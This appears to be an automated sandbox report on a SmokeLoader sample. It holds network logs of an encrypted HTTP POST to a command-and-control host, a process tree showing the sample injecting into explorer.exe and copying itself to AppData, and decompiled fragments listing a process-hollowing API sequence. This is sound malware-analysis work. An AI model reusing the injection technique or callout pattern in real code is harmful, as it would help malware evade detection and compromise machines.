                      Aug 3, 2022 17:52:36.375181913 CEST804975534.118.39.10192.168.2.3
                      Aug 3, 2022 17:52:36.429420948 CEST4975580192.168.2.334.118.39.10
                      Aug 3, 2022 17:53:06.376564026 CEST804975534.118.39.10192.168.2.3
                      Aug 3, 2022 17:53:06.376753092 CEST4975580192.168.2.334.118.39.10
                      Aug 3, 2022 17:53:06.418031931 CEST4975580192.168.2.334.118.39.10
                      Aug 3, 2022 17:53:06.454641104 CEST804975534.118.39.10192.168.2.3
                      TimestampSource PortDest PortSource IPDest IP
                      Aug 3, 2022 17:52:35.903945923 CEST5811653192.168.2.38.8.8.8
                      Aug 3, 2022 17:52:36.197936058 CEST53581168.8.8.8192.168.2.3
                      Aug 3, 2022 17:52:36.391638994 CEST5742153192.168.2.38.8.8.8
                      Aug 3, 2022 17:52:37.441411972 CEST5742153192.168.2.38.8.8.8
                      Aug 3, 2022 17:52:38.492662907 CEST5742153192.168.2.38.8.8.8
                      Aug 3, 2022 17:52:40.417336941 CEST53574218.8.8.8192.168.2.3
                      Aug 3, 2022 17:52:41.465724945 CEST53574218.8.8.8192.168.2.3
                      Aug 3, 2022 17:52:42.518218040 CEST53574218.8.8.8192.168.2.3
                      TimestampSource IPDest IPChecksumCodeType
                      Aug 3, 2022 17:52:41.465881109 CEST192.168.2.38.8.8.8cff6(Port unreachable)Destination Unreachable
                      Aug 3, 2022 17:52:42.518362045 CEST192.168.2.38.8.8.8cff6(Port unreachable)Destination Unreachable
                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                      Aug 3, 2022 17:52:35.903945923 CEST192.168.2.38.8.8.80xe7f1Standard query (0)host-file-host6.comA (IP address)IN (0x0001)
                      Aug 3, 2022 17:52:36.391638994 CEST192.168.2.38.8.8.80xad13Standard query (0)host-host-file8.comA (IP address)IN (0x0001)
                      Aug 3, 2022 17:52:37.441411972 CEST192.168.2.38.8.8.80xad13Standard query (0)host-host-file8.comA (IP address)IN (0x0001)
                      Aug 3, 2022 17:52:38.492662907 CEST192.168.2.38.8.8.80xad13Standard query (0)host-host-file8.comA (IP address)IN (0x0001)
                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                      Aug 3, 2022 17:52:36.197936058 CEST8.8.8.8192.168.2.30xe7f1No error (0)host-file-host6.com34.118.39.10A (IP address)IN (0x0001)
                      Aug 3, 2022 17:52:40.417336941 CEST8.8.8.8192.168.2.30xad13Server failure (2)host-host-file8.comnonenoneA (IP address)IN (0x0001)
                      Aug 3, 2022 17:52:41.465724945 CEST8.8.8.8192.168.2.30xad13Server failure (2)host-host-file8.comnonenoneA (IP address)IN (0x0001)
                      Aug 3, 2022 17:52:42.518218040 CEST8.8.8.8192.168.2.30xad13Server failure (2)host-host-file8.comnonenoneA (IP address)IN (0x0001)
                      • armtrksuct.net
                        • host-file-host6.com
                      Session IDSource IPSource PortDestination IPDestination PortProcess
                      0192.168.2.34975534.118.39.1080C:\Windows\explorer.exe
                      TimestampkBytes transferredDirectionData
                      Aug 3, 2022 17:52:36.242321968 CEST1197OUTPOST / HTTP/1.1
                      Connection: Keep-Alive
                      Content-Type: application/x-www-form-urlencoded
                      Accept: */*
                      Referer: http://armtrksuct.net/
                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                      Content-Length: 343
                      Host: host-file-host6.com
                      Aug 3, 2022 17:52:36.243194103 CEST1198OUTData Raw: 10 87 82 96 6b 83 d4 b5 cf 49 7a 43 77 c8 e4 8d 43 61 de 3e d3 36 6f ef ba 9e ac f5 f3 af 96 8b 18 c3 5b a5 1f 19 cc e6 9a a8 f3 dd d0 80 11 1f 77 e5 14 88 d5 da fe b7 dc 6d bd d2 e4 d8 44 d4 75 24 f3 c4 86 de 9e 66 5d 02 c9 a1 c1 64 0d a1 9e 1d
                      Data Ascii: kIzCwCa>6o[wmDu$f]dD5"^,w_G_l&fR}08xY+|b&[-(gVJHB5\@KN}=e;?d|xH.`:^*2Rb]XGfQt:@nL'lE]H
                      Aug 3, 2022 17:52:36.375181913 CEST1198INHTTP/1.1 200 OK
                      server: nginx/1.20.1
                      date: Wed, 03 Aug 2022 15:52:36 GMT
                      content-type: text/html; charset=UTF-8
                      transfer-encoding: chunked
                      Data Raw: 46 0d 0a 59 6f 75 72 20 49 50 20 62 6c 6f 63 6b 65 64 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: FYour IP blocked0


                      Click to jump to process

                      Click to jump to process

                      Click to dive into process behavior distribution

                      Click to jump to process

                      Target ID:0
                      Start time:17:51:31
                      Start date:03/08/2022
                      Path:C:\Users\user\Desktop\4cqJ4Jjd5j.exe
                      Wow64 process (32bit):true
                      Commandline:"C:\Users\user\Desktop\4cqJ4Jjd5j.exe"
                      Imagebase:0x400000
                      File size:186368 bytes
                      MD5 hash:C529659AD79B58EB83D1732B6CC88FF5
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Reputation:low

                      Target ID:1
                      Start time:17:51:34
                      Start date:03/08/2022
                      Path:C:\Users\user\Desktop\4cqJ4Jjd5j.exe
                      Wow64 process (32bit):true
                      Commandline:"C:\Users\user\Desktop\4cqJ4Jjd5j.exe"
                      Imagebase:0x400000
                      File size:186368 bytes
                      MD5 hash:C529659AD79B58EB83D1732B6CC88FF5
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Yara matches:
                      • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000001.00000002.350531051.0000000000540000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                      • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000001.00000002.350835390.0000000002431000.00000004.10000000.00040000.00000000.sdmp, Author: Joe Security
                      Reputation:low

                      Target ID:5
                      Start time:17:51:43
                      Start date:03/08/2022
                      Path:C:\Windows\explorer.exe
                      Wow64 process (32bit):false
                      Commandline:C:\Windows\Explorer.EXE
                      Imagebase:0x7ff6b8cf0000
                      File size:3933184 bytes
                      MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                      Has elevated privileges:false
                      Has administrator privileges:false
                      Programmed in:C, C++ or other language
                      Yara matches:
                      • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000005.00000000.331229772.0000000002941000.00000020.80000000.00040000.00000000.sdmp, Author: Joe Security
                      Reputation:high

                      Target ID:16
                      Start time:17:52:36
                      Start date:03/08/2022
                      Path:C:\Users\user\AppData\Roaming\brgfgda
                      Wow64 process (32bit):true
                      Commandline:C:\Users\user\AppData\Roaming\brgfgda
                      Imagebase:0x400000
                      File size:186368 bytes
                      MD5 hash:C529659AD79B58EB83D1732B6CC88FF5
                      Has elevated privileges:false
                      Has administrator privileges:false
                      Programmed in:C, C++ or other language
                      Antivirus matches:
                      • Detection: 100%, Joe Sandbox ML
                      • Detection: 39%, Virustotal, Browse
                      • Detection: 44%, ReversingLabs
                      Reputation:low

                      Target ID:18
                      Start time:17:52:40
                      Start date:03/08/2022
                      Path:C:\Users\user\AppData\Roaming\brgfgda
                      Wow64 process (32bit):true
                      Commandline:C:\Users\user\AppData\Roaming\brgfgda
                      Imagebase:0x400000
                      File size:186368 bytes
                      MD5 hash:C529659AD79B58EB83D1732B6CC88FF5
                      Has elevated privileges:false
                      Has administrator privileges:false
                      Programmed in:C, C++ or other language
                      Yara matches:
                      • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000012.00000002.416720371.00000000006C1000.00000004.10000000.00040000.00000000.sdmp, Author: Joe Security
                      • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000012.00000002.416678230.0000000000680000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                      Reputation:low

                      Reset < >

                        Execution Graph

                        Execution Coverage:6.1%
                        Dynamic/Decrypted Code Coverage:0%
                        Signature Coverage:63.2%
                        Total number of Nodes:19
                        Total number of Limit Nodes:0
                        execution_graph 668 402ad1 669 402ad2 668->669 671 402b56 669->671 672 40180c 669->672 673 40181b 672->673 674 40183e Sleep 673->674 676 401859 674->676 675 40186a NtTerminateProcess 677 401876 675->677 676->675 677->671 682 401818 683 40181b 682->683 684 40183e Sleep 683->684 686 401859 684->686 685 40186a NtTerminateProcess 687 401876 685->687 686->685 688 402a9d 689 402ad2 688->689 690 40180c 2 API calls 689->690 691 402b56 689->691 690->691

                        Callgraph

                        • Executed
                        • Not Executed
                        • Opacity -> Relevance
                        • Disassembly available
                        callgraph 0 Function_00401246 1 Function_00401748 2 Function_00401BC9 3 Function_00402ACE 53 Function_0040180C 3->53 4 Function_004011D0 5 Function_00402AD1 5->53 6 Function_00401DD3 7 Function_00401AD5 8 Function_004011D7 9 Function_00402B58 10 Function_00402DD8 11 Function_00402E59 12 Function_004023DB 13 Function_00402E5C 14 Function_004027DC 15 Function_0040195D 16 Function_0040275E 17 Function_004010DF 18 Function_00402DE2 19 Function_00401064 20 Function_004016E4 21 Function_00402B66 22 Function_00401D66 23 Function_00402F6A 24 Function_0040136B 25 Function_004011EB 26 Function_00402D6E 27 Function_004025EF 28 Function_00402BEF 29 Function_00402E75 30 Function_00402D75 31 Function_00402575 32 Function_004015F5 33 Function_00402DF5 34 Function_00402CF7 35 Function_00402D79 36 Function_004017F9 37 Function_0040187A 38 Function_00402B7A 39 Function_0040157F 40 Function_00402E7F 41 Function_004013FF 42 Function_00401381 43 Function_00402102 44 Function_00401E82 45 Function_00402B82 46 Function_00402E83 47 Function_00401884 48 Function_00401705 49 Function_00402706 50 Function_00401786 51 Function_00401686 52 Function_0040188B 53->42 54 Function_0040138C 55 Function_00401A8C 56 Function_00402993 57 Function_00402E14 58 Function_00401894 59 Function_00402794 60 Function_00402E94 61 Function_00401715 62 Function_00401297 63 Function_00401818 63->42 64 Function_00401898 65 Function_00402E98 66 Function_0040131A 67 Function_0040259B 68 Function_00402A9D 68->53 69 Function_0040281D 70 Function_0040139D 71 Function_00402E20 72 Function_004013A0 73 Function_00401822 73->42 74 Function_00401826 74->42 75 Function_00401427 76 Function_0040212C 77 Function_00401D31 78 Function_00401D32 79 Function_00401CB2 80 Function_00402D33 80->4 81 Function_00401834 81->42 82 Function_00402635 83 Function_00402DB9 84 Function_00401D3D

                        Control-flow Graph

                        C-Code - Quality: 23%
                        			E0040180C(void* __eflags, void* __fp0, intOrPtr* _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
                        				char _v8;
                        				void* __ebx;
                        				void* __edi;
                        				void* __esi;
                        				void* __ebp;
                        				void* _t11;
                        				void* _t16;
                        				intOrPtr* _t17;
                        				void* _t19;
                        				void* _t20;
                        				void* _t21;
                        
                        				_t22 = __eflags;
                        				L00401140(0x183e, _t16, _t20, _t21, __eflags, __fp0);
                        				_t17 = _a4;
                        				Sleep(0x1388);
                        				_t11 = E00401381(_t19, _t22, _t17, _a8, _a12,  &_v8); // executed
                        				if(_t11 != 0) {
                        					_push(_a16);
                        					_push(_v8);
                        					_push(_t11);
                        					_push(_t17); // executed
                        					L00401455(0x60, _t19, _t20); // executed
                        				}
                        				 *_t17(0xffffffff, 0); // executed
                        				_t17 = _t17 + 0x60;
                        				_push(0x60);
                        				asm("pushad");
                        				__ecx =  *__esp;
                        				__esp = __esp + 4;
                        				return __eax;
                        			}














                        0x0040180c
                        0x00401839
                        0x0040183e
                        0x00401846
                        0x00401854
                        0x0040185b
                        0x0040185d
                        0x00401860
                        0x00401863
                        0x00401864
                        0x00401865
                        0x00401865
                        0x0040186e
                        0x0040187a
                        0x0040188a
                        0x0040188b
                        0x0040188c
                        0x0040188f
                        0x004018a2

                        APIs
                        • Sleep.KERNELBASE(00001388), ref: 00401846
                        • NtTerminateProcess.NTDLL(000000FF,00000000,?,?,?,?), ref: 0040186E
                        Memory Dump Source
                        • Source File: 00000001.00000002.350457487.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_1_2_400000_4cqJ4Jjd5j.jbxd
                        Similarity
                        • API ID: ProcessSleepTerminate
                        • String ID:
                        • API String ID: 417527130-0
                        • Opcode ID: 48605b2c447a37bcbfe7e2e744f1bc94e20697bf77b90fed00f3eac78df6e713
                        • Instruction ID: 439418bc6b8cc85bb90c3f715c5c8777bd26b3ffbf7cafd5698f886abb68661d
                        • Opcode Fuzzy Hash: 48605b2c447a37bcbfe7e2e744f1bc94e20697bf77b90fed00f3eac78df6e713
                        • Instruction Fuzzy Hash: DA014F73608208E7DB057A968C41ABA36299B04754F24C137BA13791F1D63DCB12A76B
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Control-flow Graph

                        APIs
                        • Sleep.KERNELBASE(00001388), ref: 00401846
                        • NtTerminateProcess.NTDLL(000000FF,00000000,?,?,?,?), ref: 0040186E
                        Memory Dump Source
                        • Source File: 00000001.00000002.350457487.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_1_2_400000_4cqJ4Jjd5j.jbxd
                        Similarity
                        • API ID: ProcessSleepTerminate
                        • String ID:
                        • API String ID: 417527130-0
                        • Opcode ID: 735c82c96fcbea7bf12158d9a4ead4c90c858f64146e6fe56e595d73795e62df
                        • Instruction ID: 3ccd72cbf6c862e7ac88a574d3d4d63140f03618044998c1cc11cf15f2003e8a
                        • Opcode Fuzzy Hash: 735c82c96fcbea7bf12158d9a4ead4c90c858f64146e6fe56e595d73795e62df
                        • Instruction Fuzzy Hash: F5F03133604204E7DB047E96CC41ABA36199B04754F24C537BA13791F1D63DCB12A76B
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Control-flow Graph

                        C-Code - Quality: 17%
                        			E00401822(void* __ebx, void* __edi, void* __esi, void* __eflags, void* __fp0) {
                        				void* _t11;
                        				intOrPtr* _t17;
                        				void* _t19;
                        				void* _t22;
                        
                        				_t23 = __eflags;
                        				asm("out 0x95, eax");
                        				L00401140(0x183e, __ebx, __edi, __esi, __eflags, __fp0);
                        				_t17 =  *((intOrPtr*)(_t22 + 8));
                        				Sleep(0x1388);
                        				_t11 = E00401381(_t19, _t23, _t17,  *((intOrPtr*)(_t22 + 0xc)),  *((intOrPtr*)(_t22 + 0x10)), _t22 - 4); // executed
                        				if(_t11 != 0) {
                        					_push( *((intOrPtr*)(_t22 + 0x14)));
                        					_push( *((intOrPtr*)(_t22 - 4)));
                        					_push(_t11);
                        					_push(_t17); // executed
                        					L00401455(0x60, _t19, __edi); // executed
                        				}
                        				 *_t17(0xffffffff, 0); // executed
                        				_t17 = _t17 + 0x60;
                        				_push(0x60);
                        				asm("pushad");
                        				__ecx =  *__esp;
                        				__esp = __esp + 4;
                        				__eax = L00401140(__eax, __ebx, __edi, __esi, __eflags, __fp0);
                        				_pop(__edi);
                        				_pop(__esi);
                        				_pop(__ebx);
                        				__esp = __ebp;
                        				_pop(__ebp);
                        				return __eax;
                        			}







                        0x00401822
                        0x00401822
                        0x00401839
                        0x0040183e
                        0x00401846
                        0x00401854
                        0x0040185b
                        0x0040185d
                        0x00401860
                        0x00401863
                        0x00401864
                        0x00401865
                        0x00401865
                        0x0040186e
                        0x0040187a
                        0x0040188a
                        0x0040188b
                        0x0040188c
                        0x0040188f
                        0x00401899
                        0x0040189e
                        0x0040189f
                        0x004018a0
                        0x004018a1
                        0x004018a1
                        0x004018a2

                        APIs
                        • Sleep.KERNELBASE(00001388), ref: 00401846
                        • NtTerminateProcess.NTDLL(000000FF,00000000,?,?,?,?), ref: 0040186E
                        Memory Dump Source
                        • Source File: 00000001.00000002.350457487.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_1_2_400000_4cqJ4Jjd5j.jbxd
                        Similarity
                        • API ID: ProcessSleepTerminate
                        • String ID:
                        • API String ID: 417527130-0
                        • Opcode ID: a194699a847889707888bec4c97d3b5ba1a2af2b109fbbf12831e69875d24230
                        • Instruction ID: 86529ff08739d4d45ab2b2fe3aa627bb4dd9aa569924de5dc1b0fc6937d585b1
                        • Opcode Fuzzy Hash: a194699a847889707888bec4c97d3b5ba1a2af2b109fbbf12831e69875d24230
                        • Instruction Fuzzy Hash: FEF03133604204EBDB047E96C841ABA36299B44754F24C537BA13B91F1D63DCB12A76B
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Control-flow Graph

                        C-Code - Quality: 17%
                        			E00401826(void* __ebx, void* __edi, void* __esi, void* __eflags, void* __fp0) {
                        				void* _t8;
                        				void* _t11;
                        				intOrPtr* _t17;
                        				void* _t19;
                        				void* _t22;
                        
                        				_t23 = __eflags;
                        				asm("sbb ebx, ebp");
                        				L00401140(_t8, __ebx, __edi, __esi, __eflags, __fp0);
                        				_t17 =  *((intOrPtr*)(_t22 + 8));
                        				Sleep(0x1388);
                        				_t11 = E00401381(_t19, _t23, _t17,  *((intOrPtr*)(_t22 + 0xc)),  *((intOrPtr*)(_t22 + 0x10)), _t22 - 4); // executed
                        				if(_t11 != 0) {
                        					_push( *((intOrPtr*)(_t22 + 0x14)));
                        					_push( *((intOrPtr*)(_t22 - 4)));
                        					_push(_t11);
                        					_push(_t17); // executed
                        					L00401455(0x60, _t19, __edi); // executed
                        				}
                        				 *_t17(0xffffffff, 0); // executed
                        				_t17 = _t17 + 0x60;
                        				_push(0x60);
                        				asm("pushad");
                        				__ecx =  *__esp;
                        				__esp = __esp + 4;
                        				__eax = L00401140(__eax, __ebx, __edi, __esi, __eflags, __fp0);
                        				_pop(__edi);
                        				_pop(__esi);
                        				_pop(__ebx);
                        				__esp = __ebp;
                        				_pop(__ebp);
                        				return __eax;
                        			}








                        0x00401826
                        0x00401826
                        0x00401839
                        0x0040183e
                        0x00401846
                        0x00401854
                        0x0040185b
                        0x0040185d
                        0x00401860
                        0x00401863
                        0x00401864
                        0x00401865
                        0x00401865
                        0x0040186e
                        0x0040187a
                        0x0040188a
                        0x0040188b
                        0x0040188c
                        0x0040188f
                        0x00401899
                        0x0040189e
                        0x0040189f
                        0x004018a0
                        0x004018a1
                        0x004018a1
                        0x004018a2

                        APIs
                        • Sleep.KERNELBASE(00001388), ref: 00401846
                        • NtTerminateProcess.NTDLL(000000FF,00000000,?,?,?,?), ref: 0040186E
                        Memory Dump Source
                        • Source File: 00000001.00000002.350457487.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_1_2_400000_4cqJ4Jjd5j.jbxd
                        Similarity
                        • API ID: ProcessSleepTerminate
                        • String ID:
                        • API String ID: 417527130-0
                        • Opcode ID: 19d43838bd81236491392686aac446d18c030aded37c005789754258c9c8d03d
                        • Instruction ID: 61297dcd7f948f961e89af5f5716b1062d194a974c17104e1ab0fce138cf61ec
                        • Opcode Fuzzy Hash: 19d43838bd81236491392686aac446d18c030aded37c005789754258c9c8d03d
                        • Instruction Fuzzy Hash: C4F04F33604208A7DB04BE96CC41AAA3719AB04754F248537BB13791E1DA3DCB12A72B
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Control-flow Graph

                        C-Code - Quality: 20%
                        			E00401834(void* __ebx, void* __edi, void* __esi, void* __eflags, void* __fp0) {
                        				void* _t10;
                        				void* _t13;
                        				intOrPtr* _t19;
                        				void* _t22;
                        				void* _t25;
                        
                        				_t26 = __eflags;
                        				L00401140(_t10, __ebx, __edi, __esi, __eflags, __fp0);
                        				_t19 =  *((intOrPtr*)(_t25 + 8));
                        				Sleep(0x1388);
                        				_t13 = E00401381(_t22, _t26, _t19,  *((intOrPtr*)(_t25 + 0xc)),  *((intOrPtr*)(_t25 + 0x10)), _t25 - 4); // executed
                        				if(_t13 != 0) {
                        					_push( *((intOrPtr*)(_t25 + 0x14)));
                        					_push( *((intOrPtr*)(_t25 - 4)));
                        					_push(_t13);
                        					_push(_t19); // executed
                        					L00401455(0x60, _t22, __edi); // executed
                        				}
                        				 *_t19(0xffffffff, 0); // executed
                        				_t19 = _t19 + 0x60;
                        				_push(0x60);
                        				asm("pushad");
                        				__ecx =  *__esp;
                        				__esp = __esp + 4;
                        				__eax = L00401140(__eax, __ebx, __edi, __esi, __eflags, __fp0);
                        				_pop(__edi);
                        				_pop(__esi);
                        				_pop(__ebx);
                        				__esp = __ebp;
                        				_pop(__ebp);
                        				return __eax;
                        			}








                        0x00401834
                        0x00401839
                        0x0040183e
                        0x00401846
                        0x00401854
                        0x0040185b
                        0x0040185d
                        0x00401860
                        0x00401863
                        0x00401864
                        0x00401865
                        0x00401865
                        0x0040186e
                        0x0040187a
                        0x0040188a
                        0x0040188b
                        0x0040188c
                        0x0040188f
                        0x00401899
                        0x0040189e
                        0x0040189f
                        0x004018a0
                        0x004018a1
                        0x004018a1
                        0x004018a2

                        APIs
                        • Sleep.KERNELBASE(00001388), ref: 00401846
                        • NtTerminateProcess.NTDLL(000000FF,00000000,?,?,?,?), ref: 0040186E
                        Memory Dump Source
                        • Source File: 00000001.00000002.350457487.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_1_2_400000_4cqJ4Jjd5j.jbxd
                        Similarity
                        • API ID: ProcessSleepTerminate
                        • String ID:
                        • API String ID: 417527130-0
                        • Opcode ID: 0870dc026937b1eb0e2e38101574af244100116dae67d2ee4212e122303e269f
                        • Instruction ID: 4e4f5f6328981cf1385f7e82c295c95f43d6d852bc8dfc3b1875bfb827a549ac
                        • Opcode Fuzzy Hash: 0870dc026937b1eb0e2e38101574af244100116dae67d2ee4212e122303e269f
                        • Instruction Fuzzy Hash: BDF04932604208ABDB04BF92CC81ABA3329AB04754F248537BA12790F1D639C612A72B
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Execution Graph

                        Execution Coverage:64.7%
                        Dynamic/Decrypted Code Coverage:100%
                        Signature Coverage:42.3%
                        Total number of Nodes:26
                        Total number of Limit Nodes:7
                        execution_graph 229 25d0000 232 25d0630 229->232 231 25d0005 233 25d064c 232->233 235 25d1577 233->235 238 25d05b0 235->238 241 25d05dc 238->241 239 25d061e 240 25d05e2 GetFileAttributesA 240->241 241->239 241->240 243 25d0420 241->243 244 25d04f3 243->244 245 25d04ff CreateWindowExA 244->245 246 25d04fa 244->246 245->246 247 25d0540 PostMessageA 245->247 246->241 248 25d055f 247->248 248->246 250 25d0110 VirtualAlloc GetModuleFileNameA 248->250 251 25d017d CreateProcessA 250->251 252 25d0414 250->252 251->252 254 25d025f VirtualFree VirtualAlloc GetThreadContext 251->254 252->248 254->252 255 25d02a9 ReadProcessMemory 254->255 256 25d02e5 VirtualAllocEx NtWriteVirtualMemory 255->256 257 25d02d5 NtUnmapViewOfSection 255->257 260 25d033b 256->260 257->256 258 25d039d WriteProcessMemory SetThreadContext ResumeThread 261 25d03fb ExitProcess 258->261 259 25d0350 NtWriteVirtualMemory 259->260 260->258 260->259

                        Callgraph

                        • Executed
                        • Not Executed
                        • Opacity -> Relevance
                        • Disassembly available
                        callgraph 0 Function_025D24DD 1 Function_025D2DD5 2 Function_025D3355 3 Function_025D24D1 4 Function_025D24D2 5 Function_025D2452 6 Function_025D28CC 7 Function_025D00C3 8 Function_025D0042 8->7 9 Function_025D20FD 10 Function_025D2F7C 11 Function_025D187F 12 Function_025D2EFE 13 Function_025D2B7B 14 Function_025D34FA 15 Function_025D2275 16 Function_025D1577 54 Function_025D05B0 16->54 17 Function_025D1977 18 Function_025D33F1 19 Function_025D3571 20 Function_025D1970 21 Function_025D2573 22 Function_025D2369 23 Function_025D1EE8 24 Function_025D1CE4 25 Function_025D19E6 26 Function_025D3361 27 Function_025D1B9F 28 Function_025D1D1F 29 Function_025D349F 30 Function_025D1F99 31 Function_025D341B 32 Function_025D1D95 33 Function_025D2D15 34 Function_025D0110 35 Function_025D0010 35->8 36 Function_025D2D8F 37 Function_025D1B0B 38 Function_025D198B 39 Function_025D338A 40 Function_025D1804 41 Function_025D1E84 42 Function_025D3487 43 Function_025D2506 44 Function_025D1D01 45 Function_025D0000 55 Function_025D0630 45->55 46 Function_025D2FBD 47 Function_025D1B3F 48 Function_025D2D3B 49 Function_025D1ABA 50 Function_025D343A 51 Function_025D1EB5 52 Function_025D2F34 53 Function_025D1A37 64 Function_025D0420 54->64 55->16 55->35 56 Function_025D34B0 57 Function_025D3133 58 Function_025D222C 59 Function_025D1EA5 60 Function_025D33A4 61 Function_025D1E26 62 Function_025D1F26 63 Function_025D2EA6 64->34 65 Function_025D2622 66 Function_025D28A2

                        Control-flow Graph

                        APIs
                        • VirtualAlloc.KERNELBASE(00000000,00002800,00001000,00000004), ref: 025D0156
                        • GetModuleFileNameA.KERNELBASE(00000000,?,00002800), ref: 025D016C
                        • CreateProcessA.KERNELBASE(?,00000000), ref: 025D0255
                        • VirtualFree.KERNELBASE(?,00000000,00008000), ref: 025D0270
                        • VirtualAlloc.KERNELBASE(00000000,00000004,00001000,00000004), ref: 025D0283
                        • GetThreadContext.KERNELBASE(00000000,?), ref: 025D029F
                        • ReadProcessMemory.KERNELBASE(00000000,?,?,00000004,00000000), ref: 025D02C8
                        • NtUnmapViewOfSection.NTDLL(00000000,?), ref: 025D02E3
                        • VirtualAllocEx.KERNELBASE(00000000,?,?,00003000,00000040), ref: 025D0304
                        • NtWriteVirtualMemory.NTDLL(00000000,?,?,00000000,00000000), ref: 025D032A
                        • NtWriteVirtualMemory.NTDLL(00000000,00000000,?,00000002,00000000), ref: 025D0399
                        • WriteProcessMemory.KERNELBASE(00000000,?,?,00000004,00000000), ref: 025D03BF
                        • SetThreadContext.KERNELBASE(00000000,?), ref: 025D03E1
                        • ResumeThread.KERNELBASE(00000000), ref: 025D03ED
                        • ExitProcess.KERNEL32(00000000), ref: 025D0412
                        Memory Dump Source
                        • Source File: 00000010.00000002.410370098.00000000025D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 025D0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_16_2_25d0000_brgfgda.jbxd
                        Similarity
                        • API ID: Virtual$MemoryProcess$AllocThreadWrite$Context$CreateExitFileFreeModuleNameReadResumeSectionUnmapView
                        • String ID:
                        • API String ID: 2875986403-0
                        • Opcode ID: ec80134effe49fee59cfb16798ca45a1398515b3278bf894a8b0bf22fdce02bc
                        • Instruction ID: 243a3aad16833962a39b999815265ebafd7830015352881f0ddc5d2fdfc8dfb7
                        • Opcode Fuzzy Hash: ec80134effe49fee59cfb16798ca45a1398515b3278bf894a8b0bf22fdce02bc
                        • Instruction Fuzzy Hash: 73B1C774A00208AFDB44CF98C895F9EBBB5FF88314F248158E909AB395D771AE41CF94
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 15 25d0420-25d04f8 17 25d04ff-25d053c CreateWindowExA 15->17 18 25d04fa 15->18 20 25d053e 17->20 21 25d0540-25d0558 PostMessageA 17->21 19 25d05aa-25d05ad 18->19 20->19 22 25d055f-25d0563 21->22 22->19 23 25d0565-25d0579 22->23 23->19 25 25d057b-25d0582 23->25 26 25d05a8 25->26 27 25d0584-25d0588 25->27 26->22 27->26 28 25d058a-25d0591 27->28 28->26 29 25d0593-25d0597 call 25d0110 28->29 31 25d059c-25d05a5 29->31 31->26
                        APIs
                        • CreateWindowExA.USER32(00000200,saodkfnosa9uin,mfoaskdfnoa,00CF0000,80000000,80000000,000003E8,000003E8,00000000,00000000,00000000,00000000), ref: 025D0533
                        Strings
                        Memory Dump Source
                        • Source File: 00000010.00000002.410370098.00000000025D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 025D0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_16_2_25d0000_brgfgda.jbxd
                        Similarity
                        • API ID: CreateWindow
                        • String ID: 0$d$mfoaskdfnoa$saodkfnosa9uin
                        • API String ID: 716092398-2341455598
                        • Opcode ID: bb9b397fb3b679a7694c33bc0dbf232ca5c2d59a4e09fc52e4db1d59d2773c33
                        • Instruction ID: 0ae871309c8d0b64a0bb884bc09a818be101a27c47bd722ed76598bc05c9afe8
                        • Opcode Fuzzy Hash: bb9b397fb3b679a7694c33bc0dbf232ca5c2d59a4e09fc52e4db1d59d2773c33
                        • Instruction Fuzzy Hash: B5511770D08388DAEB11CBE8C849BDDBFB2AF11708F144058D5487F2C6C3BA5A58CB66
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 32 25d05b0-25d05d5 33 25d05dc-25d05e0 32->33 34 25d061e-25d0621 33->34 35 25d05e2-25d05f5 GetFileAttributesA 33->35 36 25d05f7-25d05fe 35->36 37 25d0613-25d061c 35->37 36->37 38 25d0600-25d060b call 25d0420 36->38 37->33 40 25d0610 38->40 40->37
                        APIs
                        • GetFileAttributesA.KERNELBASE(apfHQ), ref: 025D05EC
                        Strings
                        Memory Dump Source
                        • Source File: 00000010.00000002.410370098.00000000025D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 025D0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_16_2_25d0000_brgfgda.jbxd
                        Similarity
                        • API ID: AttributesFile
                        • String ID: apfHQ$o
                        • API String ID: 3188754299-2999369273
                        • Opcode ID: af0d3c0451304eea9a95bfbcf33a37b8699cda851cd8c30db079f59d0d7bd2d6
